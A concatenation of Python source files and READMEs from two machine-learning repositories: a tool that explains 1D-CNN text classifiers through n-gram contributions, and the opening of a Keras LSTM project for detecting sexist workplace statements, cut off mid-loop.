label = fields[0].split(":")[0]
sent = ' '.join(fields[1:])
if label in labels_ids :
id = labels_ids[label]
else :
id = last_id
last_id = last_id + 1
print(id)
labels_ids.update({label:id})
writer.writerow([sent,id])
refs = json.dumps(labels_ids, indent=4)
f = open(labels_ids_path, "w")
f.write(refs)
f.close()
<file_sep>/data/readme.txt
This directory contains datasets for sentiment analysis (imdb, amazon, yelp, merged) and for QA (qa_1000, qa_5500)
=======
Format:
=======
sentence \t class \n
=======
Details:
=======
For sentiment analysis, class is either 1 (for positive) or 0 (for negative)
For QA, class ranges from 0 to 5
"DESC": 0,
"ENTY": 1,
"ABBR": 2,
"HUM": 3,
"NUM": 4,
"LOC": 5
For the full datasets, see:
imdb: Maas et al., 2011, 'Learning word vectors for sentiment analysis'
amazon: McAuley et al., 2013, 'Hidden factors and hidden topics: Understanding rating dimensions with review text'
yelp: Yelp dataset challenge http://www.yelp.com/dataset_challenge
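A minimal sketch of reading a file in this format (the two sample lines are invented for illustration; preprocessor.py does the equivalent with pandas.read_csv and sep='\t'):

```python
import csv
import io

# Two invented lines in the "sentence \t class \n" format described above.
sample = "great food and friendly staff\t1\nthe service was terrible\t0\n"

rows = list(csv.reader(io.StringIO(sample), delimiter='\t'))
sentences = [row[0] for row in rows]
labels = [int(row[1]) for row in rows]
print(labels)  # [1, 0]
```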
<file_sep>/explainer.py
import numpy
from keras.models import Model
from keras.models import model_from_json
import math
def truncate(number, digits) -> float:
stepper = 10.0 ** digits
return math.trunc(stepper * number) / stepper
class TextCNNExplainer :
def __init__(self, tokenizer, model_file_path=None,class_names=None, kernel_sizes=[1,2,3]) :
self.tokenizer = tokenizer
self.model_file_path = model_file_path
self.class_names = class_names
self.kernel_sizes = kernel_sizes
self.conv_layers = ['conv1d_'+str(i) for i in range(1,len(kernel_sizes)+1)]
if len(kernel_sizes) > 1 :
self.max_pooled = 'concatenate_1'
else:
self.max_pooled = 'global_max_pooling1d_1'
def predict(self, model, data):
return model.predict([data]*len(self.kernel_sizes))
def compute_contrib_dense(self, model, layer_name, data):
ow = model.get_layer("dense_2").get_weights()[0]
dense1 = Model(inputs=model.input, outputs=model.get_layer(layer_name).output)
dense1_out = dense1.predict([data]*len(self.kernel_sizes))
i = 0
contribs = numpy.empty((dense1_out.shape[0],ow.shape[0], ow.shape[1]), dtype=numpy.float32)
for out in dense1_out:
out = out.reshape((out.shape[0],1))
contrib = out * ow
contrib = contrib / (sum(abs(contrib))+0.000001)
contribs[i] = contrib
i += 1
return contribs
def compute_contrib_maxpool(self, model, layer_name, data):
weights = model.get_layer('dense_1').get_weights()[0]
c1 = self.compute_contrib_dense(model, "dense_1", data)
max_pool = Model(inputs=model.input, outputs=model.get_layer(layer_name).output)
max_out = max_pool.predict([data]*len(self.kernel_sizes))
i = 0
contribs = numpy.empty((max_out.shape[0], weights.shape[0], c1.shape[2]), dtype=numpy.float32)
for (out, c) in zip(max_out, c1):
out_1 = out.reshape((out.shape[0], 1))
contrib_mat = out_1 * weights
contrib_mat = contrib_mat / abs(contrib_mat).sum(axis=0)
contrib = contrib_mat.dot(c)
contribs[i] = contrib
i += 1
return contribs
def compute_contributions(self,model, data):
c2 = self.compute_contrib_maxpool(model, self.max_pooled, data)
return c2
"""
This method takes as input a sentence and a text cnn model and compute the necessary set of positive ngrams which
explain the model decision
"""
def necessary_feature_set(self,model, sample):
sample = sample.reshape(1, len(sample))
total_filters = model.get_layer(self.max_pooled).output.shape[1]
start = 0
contributions = self.compute_contributions(model, sample)[0]
ngrams = dict()
for conv_layer, filter_size in zip(self.conv_layers, self.kernel_sizes):
intermediate_layer_model = Model(inputs=model.input,
outputs=model.get_layer(conv_layer).output)
intermediate_output = intermediate_layer_model.predict([sample]*len(self.kernel_sizes))
n_filters = intermediate_output[0].shape[1]
out = intermediate_output[0]
ngrams_indices = numpy.argmax(out, axis=0) # indices of ngrams selected by global maxpooling.
seq = [sample[0, t:t + filter_size] for t in ngrams_indices]
filtered_ngrams = self.tokenizer.sequences_to_texts(seq)
# group filters by ngram: two filters belong to the same group if they select the same ngram
for i in range(n_filters):
contrib = contributions[start + i]
filters = [start + i]
if filtered_ngrams[i] in ngrams:
filters += ngrams.get(filtered_ngrams[i]).get("filters")
contrib += ngrams.get(filtered_ngrams[i]).get("contrib")
ngrams.update({filtered_ngrams[i]: {'filters': filters, 'contrib': contrib}})
start += n_filters # jump to the next list of filter (of different size)
output_prob = model.predict([sample]*len(self.kernel_sizes))
# print(output_prob)
pred_class = numpy.argmax(output_prob)
# print(pred_class)
positive_ngrams = [(x[0], x[1], {
'relevance': x[1]['contrib'][pred_class] - numpy.mean(numpy.delete(x[1]['contrib'], pred_class))}) for x in
ngrams.items() if x[1]['contrib'][pred_class] - numpy.mean(numpy.delete(x[1]['contrib'], pred_class))>0]
positive_ngrams.sort(key=lambda tup: tup[2]['relevance'], reverse=True)
new_model = model_from_json(model.to_json())
new_model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
i = 0
retain_list = []
for ngram in positive_ngrams:
new_model.load_weights(self.model_file_path + '.h5')
y = new_model.predict([sample]*len(self.kernel_sizes))
y = y[0,pred_class]
weights = new_model.get_layer("dense_1").get_weights()
filters = ngram[1]['filters'] # all the filters associated with the current ngram
for k in filters:
weights[0][k] = 0
new_model.get_layer("dense_1").set_weights(weights)
y = new_model.predict([sample]*len(self.kernel_sizes))
y = numpy.argmax(y)
if pred_class != y:
retain_list.append(ngram)
necessary_features = {}
for ngram in retain_list:
token = ngram[0]
key = str(len(token.split())) + '-ngrams'
if key in necessary_features:
necessary_features.get(key).append({ngram[0]: ngram[2]['relevance'].item()})
else:
necessary_features.update({key: [{ngram[0]: ngram[2]['relevance'].item()}]})
print(necessary_features)
return necessary_features
"""
This method takes as input a sentence and a text cnn model and compute the sufficient set of positive ngrams which
explains the model decision
"""
def sufficient_feature_set(self,model, sample):
sample = sample.reshape(1,len(sample))
total_filters = model.get_layer(self.max_pooled).output.shape[1]
start = 0
contributions = self.compute_contributions(model, sample)[0]
ngrams = dict()
for conv_layer, filter_size in zip(self.conv_layers,self.kernel_sizes) :
intermediate_layer_model = Model(inputs=model.input,
outputs=model.get_layer(conv_layer).output)
intermediate_output = intermediate_layer_model.predict([sample]*len(self.kernel_sizes))
print(intermediate_output.shape)
n_filters = intermediate_output[0].shape[1]
out = intermediate_output[0]
ngrams_indices = numpy.argmax(out,axis = 0) #indices of ngrams selected by global maxpooling.
seq = [sample[0,t:t + filter_size] for t in ngrams_indices]
filtered_ngrams = self.tokenizer.sequences_to_texts(seq)
# group filters by ngram: two filters belong to the same group if they select the same ngram
for i in range(n_filters) :
contrib = contributions[start+i]
filters = [start+i]
if filtered_ngrams[i] in ngrams :
filters += ngrams.get(filtered_ngrams[i]).get("filters")
contrib += ngrams.get(filtered_ngrams[i]).get("contrib")
ngrams.update({filtered_ngrams[i]:{'filters':filters,'contrib':contrib}})
start+=n_filters #jump to the next list of filter (of different size)
output_prob = model.predict([sample]*len(self.kernel_sizes))
pred_class = numpy.argmax(output_prob)
positive_ngrams = [(x[0],x[1],{'relevance':x[1]['contrib'][pred_class]-numpy.mean(numpy.delete(x[1]['contrib'], pred_class))})
for x in ngrams.items() if x[1]['contrib'][pred_class]-numpy.mean(numpy.delete(x[1]['contrib'], pred_class))>0]
positive_ngrams.sort(
key=lambda tup: tup[2]['relevance'])
weights = model.get_layer("dense_1").get_weights()
new_model = model_from_json(model.to_json())
new_model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# load weights into new model
new_model.load_weights(self.model_file_path + '.h5')
i = 0
drop_list = []
print(positive_ngrams)
for ngram in positive_ngrams : # deactivate positive features one by one, least relevant first; the features still active when the prediction flips form the sufficient set
filters = ngram[1]['filters']
for k in filters:
weights[0][k] = 0
new_model.get_layer("dense_1").set_weights(weights)
y = new_model.predict([sample]*len(self.kernel_sizes))
y = numpy.argmax(y)
if pred_class != y :
break
drop_list.append(ngram)
i += 1
sufficient_features = dict()
for ngram in positive_ngrams :
if ngram not in drop_list :
token = ngram[0]
key = str(len(token.split()))+'-ngrams'
if key in sufficient_features :
sufficient_features.get(key).append({ngram[0]:ngram[2]['relevance'].item()})
else :
sufficient_features.update({key:[{ngram[0]:ngram[2]['relevance'].item()}]})
return sufficient_features
def compute_ngrams_contributions(self, model, data, targets = None):
start = 0
contribs = self.compute_contributions(model, data)
output_prob = model.predict([data]*len(self.kernel_sizes))
pred_classes = numpy.argmax(output_prob, axis=1)
if targets is not None :
target_classes = numpy.argmax(targets, axis=1)
else :
target_classes = [None]*len(pred_classes)
explanations = []
for d,y,p in zip(data,target_classes,pred_classes) :
target_class = y.item() if y is not None else None
pred_class = p.item()
if self.class_names is not None :
if target_class is not None :
target_class = self.class_names[y]
else :
target_class = None
pred_class = self.class_names[p]
e = {
'sentence': self.tokenizer.sequences_to_texts([d]),
'target_class': target_class,
'predicted_class': pred_class,
'features': {
'all': {},
'sufficient':self.sufficient_feature_set(model,d),
'necessary':self.necessary_feature_set(model,d)
}
}
explanations.append(e)
for filter_size,conv_layer in zip(self.kernel_sizes, self.conv_layers) :
intermediate_layer_model = Model(inputs=model.input,
outputs=model.get_layer(conv_layer).output)
intermediate_output = intermediate_layer_model.predict([data]*len(self.kernel_sizes))
n_filters = intermediate_output[0].shape[1]
k = 0
for (c_out, d, y, p) in zip(intermediate_output, data, target_classes, pred_classes):
max_indices = numpy.argmax(c_out, axis=0)
seq = [d[t:t+filter_size] for t in max_indices]
filtered_ngrams = self.tokenizer.sequences_to_texts(seq)
for i in range(n_filters):
contrib = contribs[k,start + i]
if filtered_ngrams[i] in explanations[k]['features']['all']:
contrib += explanations[k]['features']['all'].get(filtered_ngrams[i])
explanations[k]['features']['all'].update({filtered_ngrams[i]:contrib})
k += 1
start+=n_filters
for e, p in zip(explanations,pred_classes) :
ngrams = dict()
for key in e['features']['all'] :
l_key = str(len(key.split())) + '-ngrams' #1-grams, 2-grams, 3-grams, etc.
contrib = e['features']['all'][key]
print("Contribution", key, contrib)
rel = contrib[p]-numpy.mean(numpy.delete(contrib, p))
contrib = [v.item() for v in contrib]
if self.class_names is None :
contrib_dict = dict(zip(range(len(contrib)), contrib))
else :
contrib_dict = dict(zip(self.class_names, contrib))
contrib_dict.update({'Overall':rel.item()})
if l_key in ngrams :
ngrams.get(l_key).append({key:contrib_dict})
else :
ngrams.update({l_key:[{key: contrib_dict}]})
e['features']['all'] = ngrams
return explanations<file_sep>/analyse_merged.py
import numpy as np
from keras.preprocessing.text import Tokenizer
from sklearn.model_selection import train_test_split
import pandas as pd
import json
import os
import csv
filepath = 'data/sentiment_analysis/merged_sent.txt'
df = pd.read_csv(filepath, names=['sentence', 'label'], sep='\t', encoding="utf8")
sentences = df.sentence.astype(str).values
labels = df['label'].values
total_not = 0
total_not_neg = 0
for sent,y in zip(sentences,labels) :
sent = sent.lower()
if "not" in sent.split() :
total_not += 1
if y==0 :
total_not_neg += 1
else :
print(sent)
print(total_not, total_not_neg)<file_sep>/process_data.py
from preprocessor import Preprocessor
pre = Preprocessor(source='sent140',max_words = 50,embedding_dim=50, n_classes=3)
pre.generate_embedding_dataset() # generate train and test set consisting of embedding matrices<file_sep>/text_cnn.py
from keras import layers
from keras import optimizers
from keras.layers.merge import concatenate
import numpy
from keras.models import Model
from keras.layers import Input
numpy.set_printoptions(precision=2)
class TextCNN :
def __init__(self, batch_size=32, epochs = 50, text_length=100, embedding_dim=100, kernel_sizes = [1], n_filters = [40], n_class = 2):
self.kernel_sizes = kernel_sizes
self.n_filters = n_filters
self.embedding_dim = embedding_dim
self.batch_size = batch_size
self.text_length = text_length
self.n_class = n_class
self.model = None
self.epochs = epochs
def train(self, X_train, y_train, X_test, y_test, embedding_matrix, vocab_size):
pool = []
inputs = []
for kernel_size , n_filters in zip(self.kernel_sizes,self.n_filters) :
input_shape=(self.text_length,self.embedding_dim)
x = Input(shape=(self.text_length,))
embedding = layers.Embedding(vocab_size, self.embedding_dim, input_length=self.text_length)(x)
C1D = layers.Conv1D(n_filters, kernel_size, activation='relu',input_shape=(self.text_length,self.embedding_dim))(embedding)
MX1D = layers.GlobalMaxPool1D() (C1D)
pool.append(MX1D)
inputs.append(x)
merged = pool[0]
if len(self.kernel_sizes) > 1 :
merged = concatenate(pool)
dense1 = layers.Dense(10, activation='relu') (merged)
#dense2 = layers.Dense(10, activation='relu')(dense1)
outputs = layers.Dense(self.n_class, activation='softmax') (dense1)
self.model = Model(inputs=inputs, outputs=outputs)
sgd = optimizers.SGD(lr=0.01, decay=1e-6, momentum=0.1, nesterov=True)
self.model.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
self.model.summary()
history = self.model.fit([X_train]*len(self.kernel_sizes), y_train, epochs=self.epochs, verbose=True, validation_data=([X_test]*len(self.kernel_sizes),y_test), batch_size=self.batch_size)
return self.model
def evaluate(self, X_train, y_train, X_test, y_test):
loss, accuracy = self.model.evaluate([X_train]*len(self.kernel_sizes), y_train, verbose=False)
print("Training Accuracy: {:.4f}".format(accuracy))
loss, accuracy = self.model.evaluate([X_test]*len(self.kernel_sizes), y_test, verbose=False)
print("Testing Accuracy: {:.4f}".format(accuracy))
def save_model(self, model_name, model_dir='./models'):
model_json = self.model.to_json()
with open(model_dir+"/"+model_name+"_d"+str(self.embedding_dim)+"_l"+str(self.text_length)+".json", "w") as json_file:
json_file.write(model_json)
# serialize weights to HDF5
self.model.save_weights(model_dir+"/"+model_name+"_d"+str(self.embedding_dim)+"_l"+str(self.text_length)+".h5")
print("Saved model to disk")
<file_sep>/README.txt
This project implements a new method to explain 1D-CNNs, especially for text classification tasks. The code was designed for
experimental purposes and cannot handle arbitrary 1D-CNN architectures without adaptation. The project comes with
a multi-channel 1D-CNN model generator which can be used to generate test models.
Dependencies :
- python 3.6+
- keras (tested on 2.2+)
- numpy (1.16+)
- pandas (0.24+)
The project contains 4 main directories :
--data/sentiment_analysis
This directory contains training and test data to build 1D-CNN models and test the explanation method
-- models :
This directory contains pretrained 1D-CNN models for sentiment analysis and for question answering task.
-- tokenizers :
This directory contains saved Keras tokenizers for different datasets. Each tokenizer contains the vocabulary that was used
to train the pretrained model associated with the dataset.
-- explanations :
This directory contains the results of explanations produced by executing the file explain_cnn.py. The explanations are stored in a json
file named after the dataset/model being explained.
=======
Explaining a model
=======
- The file explain_cnn.py already has default values. Run python explain_cnn.py to execute the explainer with the default configuration.
- To explain another model on a set of samples, execute the following actions :
1. open the file explain_cnn.py and edit the model parameters :
- set the variable model_name to the model you want to explain. Pretrained model_names are : imdb, qa_1000, qa_5500, and merged
- Set the variable n_classes to the number of classes.
By default, the pretrained models were built with a word embedding dimension of 50 and a maximum number of words per sentence of 50
- Set the variable class_names to the name of classes : class_names = ['NEGATIVE','POSITIVE'] for Sentiment analysis
or class_names = ['DESC','ENTY','ABBR','HUM','NUM','LOC'] for Question Answering
- Set the variable embedding_dim to the dimension of the embedding vectors.
- The variable kernel_sizes is a list of integers representing the kernel_size per channel. Example : kernel_sizes = [1,2,3]
2. run the command python explain_cnn.py
3. The result of the explanation is contained in the directory explanations under the name : <model_name>_all_feature_ngrams.json
#To explain the model on a single sentence :
edit and execute the file explain_sentence.py
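The parameter edits in step 1 above amount to setting a few module-level variables. A minimal illustrative sketch — the variable names come from the README, but the values shown here are examples, not necessarily the shipped defaults:

```python
# Hypothetical configuration block for explain_cnn.py.
model_name = 'imdb'                      # one of: imdb, qa_1000, qa_5500, merged
n_classes = 2                            # number of classes in the dataset
class_names = ['NEGATIVE', 'POSITIVE']   # sentiment analysis labels
embedding_dim = 50                       # pretrained models use 50-dim embeddings
max_words = 50                           # maximum number of words per sentence
kernel_sizes = [1, 2, 3]                 # one kernel size per channel

# Basic consistency check: one class name per class.
assert len(class_names) == n_classes
```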
The code implemented to explain 1D-CNN assumes that the CNN architecture taken as input has exactly 2 dense layers,
a variable number of channels (from 1 to n), a single global max-pooling layer, one convolution layer per channel
and a variable number of filters and kernel_sizes per channel.
NB: Further versions will take into account models with a variable number of dense layers.
=======
Explanation results
=======
The complete json file representing the explanation for a set of predictions is structured as follows :
The json file is in the form of a list of elements where each element represents the explanation of a particular input sentence
The json element representing the explanation of each sentence was designed to be self-explanatory. Contributions are in the form
- ngram feature :
- CLASS_NAME : value
Overall represents the relevance of the feature to the predicted class, computed as the difference between its contribution to this class
and the mean of its contributions to the other classes.
[
{
"sentence": [
"it was either too cold not enough flavor or just bad"
],
"target_class": "NEGATIVE",
"predicted_class": "NEGATIVE",
"features": {
"all": {
"1-ngrams": [
{
"was": {
"NEGATIVE": 0.07160788029432297,
"POSITIVE": -0.06556335836648941,
"Overall": 0.13717123866081238
}
},
...
],
"0-ngrams": [
{
"": {
"NEGATIVE": 0.1498018503189087,
"POSITIVE": -0.11607369035482407,
"Overall": 0.26587554812431335
}
}
]
},
"sufficient": {
"1-ngrams": [
{
"not": 0.38679349422454834
}
]
},
"necessary": {}
}
},
...
]
"0-ngram" represents ngram features which are not in the vocabulary or the translation of 0-padding sequences
=======
Training a 1D-CNN model
=======
The project comes with code to train your own 1D-CNN.
To build your own CNN model :
1. Define the following parameters :
- model_name : model names are defined in the variable file_path_dic. If you want to build a model from your
own dataset, make sure the data file is saved inside the directory data/sentiment_analysis and that its format is as described in data/readme.txt.
Also make sure to add an entry corresponding to the data file in the dictionary file_path_dic
- embedding_dim : the dimension of word embeddings
- n_classes : The number of classes in the dataset
- max_words : The maximum number of words per sentence. Sentences with fewer words will be padded and longer sentences will
be truncated to max_words
- kernel_sizes : a list of integers indicating the kernel_size per channel. Example : kernel_sizes = [1,2,3] means that there are 3 channels
and the first channel has filters of kernel_size 1, the second channel has filters of kernel_size 2 and the third channel has filters of
kernel_size 3
- n_filters : a list representing the number of filters per channel. Example : n_filters = [40,40,40]. It means that every channel has 40 filters
which makes a total of 120 filters.
NB : len(kernel_sizes) == len (n_filters)
2. Then execute the command python train_1d_cnn.py
The model will be saved in the directory models under a name related to the name defined in the variable model_name
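The parameters above can be sketched as a short configuration block — variable names follow the README, values are illustrative:

```python
# Hypothetical parameter set for train_1d_cnn.py.
model_name = 'merged'
embedding_dim = 50          # dimension of word embeddings
n_classes = 2               # number of classes in the dataset
max_words = 50              # pad/truncate every sentence to this length
kernel_sizes = [1, 2, 3]    # 3 channels with kernel sizes 1, 2 and 3
n_filters = [40, 40, 40]    # 40 filters per channel

# The README's constraint: one filter count per channel.
assert len(kernel_sizes) == len(n_filters)

total_filters = sum(n_filters)
print(total_filters)  # 120 filters overall
```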
<file_sep>/process_tripa.py
import glob
import json
import csv
import nltk
def jsontocsv():
files = glob.glob("json/*.json")
data_file = open('data_file.csv', 'w', encoding='utf-8')
for file in files:
with open(file) as json_file:
data = json.load(json_file)
reviews=data['Reviews']
sentenceid=1
csv_writer = csv.writer(data_file)
header=['sentenceid', 'reviewid', 'content']
csv_writer.writerow(header)
for review in reviews:
reviewid=review["ReviewID"]
content=review["Content"]
sentences = nltk.sent_tokenize(content)
for sentence in sentences:
csv_writer.writerow([sentenceid, reviewid, sentence])
sentenceid+=1
data_file.close()
jsontocsv()
<repo_name>JaquJaqu/Automatic_Detection_of_Sexist_Statements_Commonly_Used_at_the_Workplace<file_sep>/SexisteDetectionMain.py
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.layers import Dense, Input, Dropout, LSTM, Activation, TimeDistributed, Flatten, merge#, GlobalAveragePooling1D, regularizers
from keras.layers.embeddings import Embedding
from keras.layers import Bidirectional, Concatenate, Permute, Dot, Input, LSTM, Multiply
from keras.layers import RepeatVector, Dense, Activation, Lambda
from keras.models import load_model, Model, Sequential
from keras.utils import plot_model
from sklearn.metrics import f1_score, precision_score, recall_score
from sklearn.ensemble import GradientBoostingClassifier, AdaBoostRegressor, AdaBoostClassifier
from sklearn.model_selection import train_test_split
from SD_utils import *
from nmt_utils import *
import os
import io
import pprint as pp
import gc
np.random.seed(0)
#os.environ["PATH"] += os.pathsep + 'C:/Program Files/graphviz-2.38/bin'
sexist_dataset_fn = 'data/SD_dataset_FINAL.csv'
embedding_fn = 'data/vectors.txt'
word_to_index, index_to_word, word_to_vec_map = read_glove_vecs(embedding_fn)
X, y = read_csv(sexist_dataset_fn)
m = len(y)
maxLen = len(max(X, key=len).split()) + 1
def sentence_to_avg(sentence, word_to_vec_map):
"""
Converts a sentence (string) into a list of words (strings). Extracts the GloVe representation of each word
and averages its value into a single vector encoding the meaning of the sentence.
Arguments:
sentence -- string, one training example from X
word_to_vec_map -- dictionary mapping every word in a vocabulary into its 50-dimensional vector representation
Returns:
avg -- average vector encoding information about the sentence, numpy-array of shape (50,)
"""
words = sentence.lower().split()
avg = np.zeros(50)
for w in words:
if w in word_to_vec_map:
avg += word_to_vec_map[w]
avg = avg / len(words)
return avg
def sentences_to_indices(X_s, word_to_index, max_len):
"""
Converts an array of sentences (strings) into an array of indices corresponding to words in the sentences.
The output shape should be such that it can be given to `Embedding()` (described in Figure 4).
Arguments:
X -- array of sentences (strings), of shape (m, 1)
word_to_index -- a dictionary containing the each word mapped to its index
max_len -- maximum number of words in a sentence. You can assume every sentence in X is no longer than this.
Returns:
X_indices -- array of indices corresponding to words in the sentences from X, of shape (m, max_len)
"""
m = X_s.shape[0] # number of training examples
X_indices = np.zeros((m, max_len)) # one row of word indices per sentence
for i in range(m): # loop over training examples
sentence_words = X_s[i].lower().split()
j = 0
for w in sentence_words:
if j < max_len and w in word_to_index:
X_indices[i, j] = word_to_index[w]
j = j + 1
return X_indices
def pretrained_embedding_layer(word_to_vec_map, word_to_index):
"""
Creates a Keras Embedding() layer and loads in pre-trained GloVe 50-dimensional vectors.
Arguments:
word_to_vec_map -- dictionary mapping words to their GloVe vector representation.
word_to_index -- dictionary mapping from words to their indices in the vocabulary (400,001 words)
Returns:
embedding_layer -- pretrained layer Keras instance
"""
vocab_len = len(word_to_index) + 2 # add extra rows to fit the Keras Embedding requirement (padding/OOV)
emb_dim = word_to_vec_map["cucumber"].shape[0] # define dimensionality of your GloVe word vectors (= 50)
print(emb_dim)
# Initialize the embedding matrix as a numpy array of zeros of shape (vocab_len, dimensions of word vectors = emb_dim)
emb_matrix = np.zeros((vocab_len, emb_dim))
# Set each row "index" of the embedding matrix to be the word vector representation of the "index"th word of the vocabulary
for word, index in word_to_index.items():
emb_matrix[index, :] = word_to_vec_map[word]
# Define Keras embedding layer with the correct output/input sizes, make it trainable. Use Embedding(...). Make sure to set trainable=False.
embedding_layer = Embedding(vocab_len, emb_dim, trainable=False)
### END CODE HERE ###
# Build the embedding layer, it is required before setting the weights of the embedding layer. Do not modify the "None".
embedding_layer.build((None,))
# Set the weights of the embedding layer to the embedding matrix. Your layer is now pretrained.
embedding_layer.set_weights([emb_matrix])
return embedding_layer
def modelV1(X, Y, word_to_vec_map, learning_rate=0.01, num_iterations=500):
"""
Model to train word vector representations in numpy.
Arguments:
X -- input data, numpy array of sentences as strings, of shape (m, 1)
Y -- labels, numpy array of integers between 0 and 7, numpy-array of shape (m, 1)
word_to_vec_map -- dictionary mapping every word in a vocabulary into its 50-dimensional vector representation
learning_rate -- learning_rate for the stochastic gradient descent algorithm
num_iterations -- number of iterations
Returns:
pred -- vector of predictions, numpy-array of shape (m, 1)
W -- weight matrix of the softmax layer, of shape (n_y, n_h)
b -- bias of the softmax layer, of shape (n_y,)
"""
np.random.seed(1)
# Define number of training examples
r = Y.shape[0] # number of training examples
n_y = 5 # number of classes
n_h = 50 # dimensions of the GloVe vectors
# Initialize parameters using Xavier initialization
W = np.random.randn(n_y, n_h) / np.sqrt(n_h)
b = np.zeros((n_y,))
# Convert Y to Y_onehot with n_y classes
Y_oh = convert_to_one_hot(Y, C=n_y)
# Optimization loop
for t in range(num_iterations): # Loop over the number of iterations
for i in range(r): # Loop over the training examples
avg = sentence_to_avg(X[i], word_to_vec_map)
z = np.dot(W, avg) + b
a = softmax_SD(z)
cost = -np.dot(Y_oh[i], np.log(a))
# Compute gradients
dz = a - Y_oh[i]
dW = np.dot(dz.reshape(n_y, 1), avg.reshape(1, n_h))
db = dz
# Update parameters with Stochastic Gradient Descent
W = W - learning_rate * dW
b = b - learning_rate * db
if t % 100 == 0:
print("Epoch: " + str(t) + " --- cost = " + str(cost))
pred_ret = predict(X, Y, W, b, word_to_vec_map)
return pred_ret, W, b
def modelV2(input_shape, word_to_vec_map, word_to_index, lay1_num=128, lay2_num=128):
"""
Function creating the Emojify-v2 model's graph.
Arguments:
input_shape -- shape of the input, usually (max_len,)
word_to_vec_map -- dictionary mapping every word in a vocabulary into its 50-dimensional vector representation
word_to_index -- dictionary mapping from words to their indices in the vocabulary (400,001 words)
Returns:
model -- a model instance in Keras
"""
sentence_indices = Input(shape=input_shape, dtype='int32')
embedding_layer = pretrained_embedding_layer(word_to_vec_map, word_to_index)
embeddings = embedding_layer(sentence_indices)
X = LSTM(lay1_num, return_sequences=True)(embeddings)
X = Dropout(0.5)(X)
X = LSTM(lay2_num, return_sequences=False)(X)
X = Dropout(0.5)(X)
X = Dense(2, activation='softmax')(X)
X = Activation('softmax')(X)
model = Model(inputs=sentence_indices, outputs=X)
return model
def modelV3(input_shape, word_to_vec_map, word_to_index, lay1_num=128, lay2_num=128):
sentence_indices = Input(shape=input_shape, dtype='int32')
embedding_layer = pretrained_embedding_layer(word_to_vec_map, word_to_index)
embeddings = embedding_layer(sentence_indices)
X = Bidirectional(LSTM(lay1_num, return_sequences=True), input_shape=input_shape)(embeddings)
X = Dropout(0.5)(X)
X = Bidirectional(LSTM(lay2_num, return_sequences=False), input_shape=input_shape)(X)
X = Dropout(0.5)(X)
X = Dense(2, activation='softmax')(X)
X = Activation('softmax')(X)
model = Model(inputs=sentence_indices, outputs=X)
return model
def modelV4(input_shape, word_to_vec_map, word_to_index, lay1_num=128, lay2_num=128, n_features=50,
isRandom=False, isAttention=True):
sentence_indices = Input(shape=input_shape, dtype='int32')
embeddings = None
if isRandom:
vocab_len, emb_dim = len(word_to_index) + 1, word_to_vec_map["cucumber"].shape[0]
embedding_layer = Embedding(len(word_to_index) + 1, 50,
input_length=maxLen) # embedding_layer(sentence_indices)
emb_matrix = np.zeros((vocab_len, emb_dim))
for word, index in word_to_index.items():
emb_matrix[index, :] = np.random.rand(1, emb_dim)
embedding_layer.build((None,))
embedding_layer.set_weights([emb_matrix])
embeddings = embedding_layer(sentence_indices)
else:
embedding_layer = pretrained_embedding_layer(word_to_vec_map, word_to_index)
embeddings = embedding_layer(sentence_indices)
X = Bidirectional(LSTM(lay1_num, return_sequences=True), input_shape=input_shape)(embeddings)
X = Dropout(0.5)(X)
if isAttention:
attention = Dense(1, activation='tanh')(X)
attention = Flatten()(attention)
attention = Activation('softmax')(attention)
attention = RepeatVector(lay1_num * 2)(attention)
attention = Permute([2, 1])(attention)
sent_representation = merge.Multiply()([X, attention])
sent_representation = Lambda(lambda xin: K.sum(xin, axis=1))(sent_representation)
X = Dropout(0.5)(sent_representation)
else:
X = Bidirectional(LSTM(lay2_num, return_sequences=False), input_shape=input_shape)(X)
X = Dropout(0.5)(X)
pass
X = Dense(2, activation='softmax')(X)
X = Activation('softmax')(X)
model = Model(inputs=sentence_indices, outputs=X)
return model
tests_dict, wrongs_dict = {}, {}
num_it = 10
n_models = 4
acc_sum_v = [0] * (n_models + 1)
fp_sum_v, fn_sum_v = [0] * (n_models + 1), [0] * (n_models + 1)
tp_sum_v, tn_sum_v = [0] * (n_models + 1), [0] * (n_models + 1)
num_0s_sum, num_1s_sum = 0, 0
runModels = [None,
True, # run ModelV1?
True, # run ModelV2?
True, # run ModelV3?
True,] # run ModelV4?
gb_accs = [0, 0, 0]
if __name__ == "__main__":
for it in range(num_it):
print("\nIteration #" + str(it + 1))
X, y = read_csv(sexist_dataset_fn)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=np.random)
maxLen = len(max(X, key=len).split()) + 1
y_oh_train = convert_to_one_hot(y_train, C=2)
y_oh_test = convert_to_one_hot(y_test, C=2)
num_1s = sum(y_test)
num_0s = y_test.shape[0] - num_1s
num_0s_sum += num_0s
num_1s_sum += num_1s
# V1 model
if runModels[1]:
pred, W, b = modelV1(X_train, y_train, word_to_vec_map)
pred_train, _ = predict(X_train, y_train, W, b, word_to_vec_map)
predV1, acc1 = predict(X_test, y_test, W, b, word_to_vec_map)
v1_tp, v1_tn, v1_fp, v1_fn = 0, 0, 0, 0
for k in range(len(X_test)):
num = predV1[k]
if num != y_test[k]:
if int(num) == 1:
v1_fp += 1
elif int(num) == 0:
v1_fn += 1
else:
if int(num) == 1:
v1_tp += 1
elif int(num) == 0:
v1_tn += 1
tp_sum_v[1] += v1_tp
tn_sum_v[1] += v1_tn
fp_sum_v[1] += v1_fp
fn_sum_v[1] += v1_fn
acc_sum_v[1] += acc1
print("0 misclass: " + str(v1_fp / (v1_tn + v1_fp)))
print("1 misclass: " + str(v1_fn / (v1_tp + v1_fn)))
print("Overall accuracy: " + str(acc1))
gc.collect()
# V2 model
if runModels[2]:
model_v2 = modelV2((maxLen,), word_to_vec_map, word_to_index, lay1_num=128, lay2_num=128)
model_v2.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
X_train_indices = sentences_to_indices(X_train, word_to_index, maxLen)
y_train_oh = convert_to_one_hot(y_train, C=2)
model_v2.fit(X_train_indices, y_train_oh, epochs=30, batch_size=32, shuffle=True)
X_test_indices = sentences_to_indices(X_test, word_to_index, max_len=maxLen)
y_test_oh = convert_to_one_hot(y_test, C=2)
loss, acc2 = model_v2.evaluate(X_test_indices, y_test_oh)
predV2 = model_v2.predict(X_test_indices)
v2_tp, v2_tn, v2_fp, v2_fn = 0, 0, 0, 0
for k in range(len(X_test)):
